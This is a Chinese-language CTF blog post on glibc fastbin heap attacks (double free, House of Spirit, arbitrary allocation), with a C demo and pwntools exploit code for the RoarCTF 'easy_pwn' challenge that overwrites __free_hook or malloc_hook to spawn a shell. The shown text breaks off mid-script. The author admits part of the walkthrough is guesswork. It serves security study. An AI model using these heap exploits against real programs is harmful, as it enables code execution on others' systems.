<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">





  <link rel="alternate" href="/atom.xml" title="zhz'blog" type="application/atom+xml">






<meta name="description" content="总结一下， fasted bin attack有两种打法 第一种是侧重free函数释放真的chunk或伪造的chunk，然后再次申请chunk进行攻击。 第二种是侧重fd指针，将其修改，进行堆块的任意地址分配，从而达到任意地址写。 （其实个人感觉，总的来说，最终目的都是针对于fd进行操作） fastbin double free Fastbin Double Free 是指 fastbin 的 c">
<meta property="og:type" content="article">
<meta property="og:title" content="fastedbin attack 探究">
<meta property="og:url" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/index.html">
<meta property="og:site_name" content="zhz&#39;blog">
<meta property="og:description" content="总结一下， fasted bin attack有两种打法 第一种是侧重free函数释放真的chunk或伪造的chunk，然后再次申请chunk进行攻击。 第二种是侧重fd指针，将其修改，进行堆块的任意地址分配，从而达到任意地址写。 （其实个人感觉，总的来说，最终目的都是针对于fd进行操作） fastbin double free Fastbin Double Free 是指 fastbin 的 c">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/figure/fastbin_free_chunk3.png">
<meta property="og:image" content="d:%5Cblog%5CHexo%5Csource_posts%5C%C2%96fastedbin-attack-%E6%8E%A2%E7%A9%B6%5Cimage-20200415101909292.png">
<meta property="og:image" content="d:%5Cblog%5CHexo%5Csource_posts%5C%C2%96fastedbin-attack-%E6%8E%A2%E7%A9%B6%5Cimage-20200415105145170.png">
<meta property="og:image" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/1571551706196.png">
<meta property="og:image" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/1571551912003.png">
<meta property="og:image" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/1571552115654.png">
<meta property="og:image" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/1571552133076.png">
<meta property="og:image" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/1571552279804.png">
<meta property="og:image" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/1571553593599.png">
<meta property="og:image" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/1571556976417.png">
<meta property="og:image" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/1571553628633.png">
<meta property="og:image" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/1571557000576.png">
<meta property="og:image" content="http://yoursite.com/2019/10/28/fastedbin-attack-探究/1571554995553.png">
<meta property="og:image" content="https://bbs.pediy.com/upload/attach/201901/3_8D489B4GNW7QYK4.jpg">
<meta property="og:image" content="https://bbs.pediy.com/upload/attach/201901/3_CPMMKR8DZNMSN73.jpg">
<meta property="og:image" content="d:%5Cblog%5CHexo%5Csource_posts%5C%C2%96fastedbin-attack-%E6%8E%A2%E7%A9%B6%5Cimage-20191208011303551.png">
<meta property="og:updated_time" content="2020-04-24T14:27:32.350Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="fastedbin attack 探究">
<meta name="twitter:description" content="总结一下， fasted bin attack有两种打法 第一种是侧重free函数释放真的chunk或伪造的chunk，然后再次申请chunk进行攻击。 第二种是侧重fd指针，将其修改，进行堆块的任意地址分配，从而达到任意地址写。 （其实个人感觉，总的来说，最终目的都是针对于fd进行操作） fastbin double free Fastbin Double Free 是指 fastbin 的 c">
<meta name="twitter:image" content="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/figure/fastbin_free_chunk3.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/10/28/fastedbin-attack-探究/">





  <title>fastedbin attack 探究 | zhz'blog</title>
  








<script src="https://cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome/css/font-awesome.min.css">
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">zhz'blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">记录一些东西</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/28/fastedbin-attack-探究/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zhz">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/zhz.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zhz'blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">fastedbin attack 探究</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-10-28T23:16:06+08:00">
                2019-10-28
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>总结一下， fasted bin attack有两种打法</p>
<p>第一种是侧重free函数释放真的chunk或伪造的chunk，然后再次申请chunk进行攻击。</p>
<p>第二种是侧重fd指针，将其修改，进行堆块的任意地址分配，从而达到任意地址写。</p>
<p>（其实个人感觉，总的来说，最终目的都是针对于fd进行操作）</p>
<h3 id="fastbin-double-free"><a href="#fastbin-double-free" class="headerlink" title="fastbin double free"></a>fastbin double free</h3><p> Fastbin Double Free 是指 fastbin 的 chunk 可以被多次释放，因此可以在 fastbin 链表中存在多次 。</p>
<p>类似于 <img src="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/figure/fastbin_free_chunk3.png" alt="img"> </p>
<p>此时，chunk1被再次释放，其fd指向chunk2。</p>
<p>我们进行第一次malloc，得到chunk1，然后在chunk1.fd的位置写入你想要的地址，然后进行第二次malloc，获得chunk2，再进行第三次malloc，再次得到chunk1，因为此时chunk1的fd已经被你修改为你想要的地址，所以你进行第四次malloc的时候，会依据你chunk1.fd的内容在那个地址进行堆块分配。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">chunk</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    <span class="keyword">long</span> <span class="keyword">long</span> pre_size;</span><br><span class="line">    <span class="keyword">long</span> <span class="keyword">long</span> size;</span><br><span class="line">    <span class="keyword">long</span> <span class="keyword">long</span> fd;</span><br><span class="line">    <span class="keyword">long</span> <span class="keyword">long</span> bk;</span><br><span class="line">&#125; CHUNK,*PCHUNK;</span><br><span class="line"></span><br><span class="line">CHUNK bss_chunk;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">void</span> *chunk1,*chunk2,*chunk3;</span><br><span class="line">    <span class="keyword">void</span> *chunk_a,*chunk_b;</span><br><span class="line"></span><br><span class="line">    bss_chunk.size=<span class="number">0x21</span>;</span><br><span class="line">    chunk1=<span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line">    chunk2=<span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">free</span>(chunk1);</span><br><span class="line">    <span class="built_in">free</span>(chunk2);</span><br><span class="line">    <span class="built_in">free</span>(chunk1);</span><br><span class="line"></span><br><span class="line">    chunk_a=<span class="built_in">malloc</span>(<span class="number">0x10</span>);<span class="comment">//chunk1</span></span><br><span class="line">    *(<span class="keyword">long</span> <span class="keyword">long</span> *)chunk_a=&amp;bss_chunk;</span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x10</span>);<span class="comment">//chunk2</span></span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x10</span>);<span class="comment">//再一次malloc的chunk1</span></span><br><span class="line">    chunk_b=<span class="built_in">malloc</span>(<span class="number">0x10</span>);<span class="comment">//此时根据你第一次malloc时写好的chunk1.fd进行分配堆块。</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"%p"</span>,chunk_b);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="House-Of-Spirit"><a href="#House-Of-Spirit" class="headerlink" title="House Of Spirit"></a>House Of Spirit</h3><p> 该技术的核心在于在目标位置处伪造 fastbin chunk，并将其释放，从而达到分配<strong>指定地址</strong>的 chunk 的目的。 </p>
<p>这里，主要有几个本憨憨学的时候难以理解的点，来讲解一下。</p>
<p><img src="D:%5Cblog%5CHexo%5Csource_posts%5C%C2%96fastedbin-attack-%E6%8E%A2%E7%A9%B6%5Cimage-20200415101909292.png" alt="image-20200415101909292"></p>
<p>我们想要控制data2中的数据，可data2中的数据我们根本无法进行操作，但是data1和data3的数据我们有权限和能力进行修改</p>
<p>并且！！！！！！！</p>
<p>我们有能力去改动堆块指针，使得堆块指针能指向我们要的伪造地址</p>
<p>这个时候就完美符合House of Spirit的攻击要求了。</p>
<p>利用思路是:</p>
<p>（1）先在data1中伪造堆块，使得伪造的chunk的size位能够完美包含data2，并且在data3中伪造好下一个堆块，以绕过检测。</p>
<p>（2）改动堆块指针，使其指向我们伪造的堆块(这里注意，指向的得是伪造chunk的mem(也就是data域) 而不是head域)。</p>
<p>（3）将指针指向的伪造chunk进行free，使其放入fast bin 单链表里。</p>
<p>（4）申请堆块，这样，就会申请到data1中，data2的数据就可控啦<del>~</del>。</p>
<p>这里需要注意的点是:</p>
<p>1.mmap标志位不能被置1，不然会调用munmap_chunk去释放chunk(我寻思，一般没人会触发这个检测机制报错的)</p>
<p>2.伪造chunk的size字段不能超过fastbin最大值(我寻思，这玩意儿一般也没人会傻到触发报错)</p>
<p>3.在利用思路(3)这里，因为是fastbin，所以还会对后一个堆块的size进行检测，也就是下面这个</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (__builtin_expect (chunk_at_offset (p, size)-&gt;size &lt;= <span class="number">2</span> * SIZE_SZ, <span class="number">0</span>)</span><br><span class="line">        || __builtin_expect (chunksize (chunk_at_offset (p, size))</span><br><span class="line">                          &gt;= av-&gt;system_mem, <span class="number">0</span>))                        </span><br><span class="line">    <span class="comment">/*最后是下一个堆块的大小，要大于2*SIZE_ZE小于system_mem*/</span></span><br></pre></td></tr></table></figure>

<p>对应到伪造堆块那张示意图来说，需要在data1中伪造好size字段绕过第一个和第二个检查，data3则是伪造的是下一个堆块的size来绕过最后一个检查。</p>
<p>可以进行如图所示的一种构造</p>
<p><img src="D:%5Cblog%5CHexo%5Csource_posts%5C%C2%96fastedbin-attack-%E6%8E%A2%E7%A9%B6%5Cimage-20200415105145170.png" alt="image-20200415105145170"></p>
<h3 id="Arbitrary-Alloc"><a href="#Arbitrary-Alloc" class="headerlink" title="Arbitrary Alloc"></a>Arbitrary Alloc</h3><h4 id="easy-pwn"><a href="#easy-pwn" class="headerlink" title="easy_pwn"></a>easy_pwn</h4><p>这题来源于roar ctf。</p>
<p>这题的漏洞点在于write的时候出现了off by one漏洞，漏洞规则在于 只要你edit的size比原size大10，就可造成off by one。利用就是off by one + chunk overlapping + fasted bin attack</p>
<p>那么结合exp开始深入分析</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">'./easy_pwn'</span>)</span><br><span class="line">libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(size)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'1'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(index, size, content)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'2'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(index))</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(size))</span><br><span class="line">    sh.sendafter(<span class="string">': '</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(index)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'3'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">(index)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'4'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(index))</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x18</span>)<span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x68</span>)<span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x10</span>)<span class="comment">#3</span></span><br></pre></td></tr></table></figure>

<p>此处先构造好堆块，为什么设置0x18呢。</p>
 <img src="/2019/10/28/fastedbin-attack-探究/1571551706196.png"> 

<p>这题的规则就是你create的size位多少，它就允许你写入多少，off by one修改下一堆块的size位的话，自然需要0x18的size，覆盖pre_size，使得off by one能够覆盖下一堆块的size位。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">edit(<span class="number">0</span>,<span class="number">0x18</span> +<span class="number">10</span>, <span class="string">'a'</span>*<span class="number">0x18</span> + p8(<span class="number">0x91</span>) )</span><br></pre></td></tr></table></figure>

<img src="/2019/10/28/fastedbin-attack-探究/1571551912003.png">

<p>成功修改！注意，这里使用了堆叠技巧。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">delete(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p>将整个0x91的伪造堆块放入unsorted bin里面</p>
<img src="/2019/10/28/fastedbin-attack-探究/1571552115654.png">

<img src="/2019/10/28/fastedbin-attack-探究/1571552133076.png">



<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x18</span>)</span><br></pre></td></tr></table></figure>

<p>这里是为了create分割堆块，使得unsorted bin的地址落入chunk2的内容里。因为chunk2实际上没有被free，所以允许show出地址。同时为了下面的fastedbin attack做准备。</p>
<img src="/2019/10/28/fastedbin-attack-探究/1571552279804.png">



<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">show(<span class="number">2</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'content: '</span>)</span><br><span class="line">result = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">log.success(<span class="string">'result = '</span> + hex(result))</span><br><span class="line"><span class="comment">#gdb.attach(sh)</span></span><br><span class="line">libc_addr = result - <span class="number">0x3c4b78</span></span><br></pre></td></tr></table></figure>

<p>此处的0x3c4b78是根据leak出的 unsorted bin 地址减去 /proc/线程号/maps里的libc基址得到的。</p>
<p>因为偏移量是不变的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">edit(<span class="number">2</span>, <span class="number">0x10</span>, p64(<span class="number">0</span>) + p64(libc_addr + libc.symbols[<span class="string">'__free_hook'</span>] - <span class="number">0x40</span>))</span><br><span class="line">gdb.attach(sh)</span><br></pre></td></tr></table></figure>

<img src="/2019/10/28/fastedbin-attack-探究/1571553593599.png">

<p>此处修改bk为__free_hook - 0x40的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x68</span>)<span class="comment">#4</span></span><br><span class="line">delete(<span class="number">4</span>)</span><br></pre></td></tr></table></figure>

<img src="/2019/10/28/fastedbin-attack-探究/1571556976417.png"> 

<img src="/2019/10/28/fastedbin-attack-探究/1571553628633.png"> 

<p>此处为了使得fasted bin 0x70里面存在free后的堆块，使得后面fd攻击成功</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">edit(<span class="number">2</span>, <span class="number">8</span>, p64(libc_addr + libc.symbols[<span class="string">'__free_hook'</span>] - <span class="number">0x33</span>))</span><br></pre></td></tr></table></figure>

<p>修改fd位</p>
<img src="/2019/10/28/fastedbin-attack-探究/1571557000576.png">



<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x68</span>)<span class="comment">#5</span></span><br></pre></td></tr></table></figure>

<img src="/2019/10/28/fastedbin-attack-探究/1571554995553.png">



<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x68</span>)<span class="comment">#6</span></span><br><span class="line">edit(<span class="number">5</span>, <span class="number">0x23</span> + <span class="number">8</span>, <span class="string">''</span> * <span class="number">0x23</span> + p64(libc_addr + libc.symbols[<span class="string">'system'</span>]))</span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,<span class="number">8</span>,<span class="string">'/bin/sh\x00'</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>好了，我摊牌了，我是傻逼，看不懂上面那个修改BK的操作，上面是胡乱分析的。</p>
<p>刚好，也借用这道题来尝试不同的打法！</p>
<h5 id="第一种-malloc-hook"><a href="#第一种-malloc-hook" class="headerlink" title="第一种:malloc_hook"></a>第一种:malloc_hook</h5><p>malloc函数会首先检查malloc_hook的值，若不为0则会调用他。若我们能通过内存写入malloc_hook即可实现任意地址跳转!<br>可通过fastbin_attack，我们从malloc_hook往上面观察，会发现在malloc_hook上方存在一个0x7fxxxxxx的数据，而我们可以通过错位，刚好使得7f的位置移动到类似于正常堆块的size的位置从而成功写入chunk。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">'./easy_pwn'</span>)</span><br><span class="line">libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line"><span class="comment">#sh = remote('node3.buuoj.cn',28685)</span></span><br><span class="line"><span class="comment">#libc = ELF('./x64_libc.so.6')</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(size)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'1'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(index, size, content)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'2'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(index))</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(size))</span><br><span class="line">    sh.sendafter(<span class="string">': '</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(index)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'3'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">(index)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'4'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">z</span><span class="params">(commond=<span class="string">''</span>)</span>:</span></span><br><span class="line">    gdb.attach(sh,commond)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x68</span>)<span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x10</span>)<span class="comment">#3</span></span><br><span class="line">edit(<span class="number">0</span>,<span class="number">0x18</span> +<span class="number">10</span>, <span class="string">'a'</span>*<span class="number">0x18</span> + p8(<span class="number">0x91</span>) )</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line">show(<span class="number">2</span>)</span><br><span class="line"><span class="comment">#sh.recvuntil("choice: ")</span></span><br><span class="line">result = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">log.success(<span class="string">'result = '</span> + hex(result))</span><br><span class="line">libc_addr = result - <span class="number">0x3c4b78</span></span><br><span class="line">malloc_hook = libc_addr +<span class="number">0x3c4b10</span></span><br><span class="line">log.success(<span class="string">'malloc_hook = '</span> + hex(malloc_hook))</span><br><span class="line">ong_a = libc_addr + <span class="number">0x4526a</span></span><br><span class="line"><span class="comment">#edit(2, 0x10, p64(0) + p64(libc_addr + libc.symbols['__free_hook'] - 0x40))</span></span><br><span class="line">add(<span class="number">0x60</span>)<span 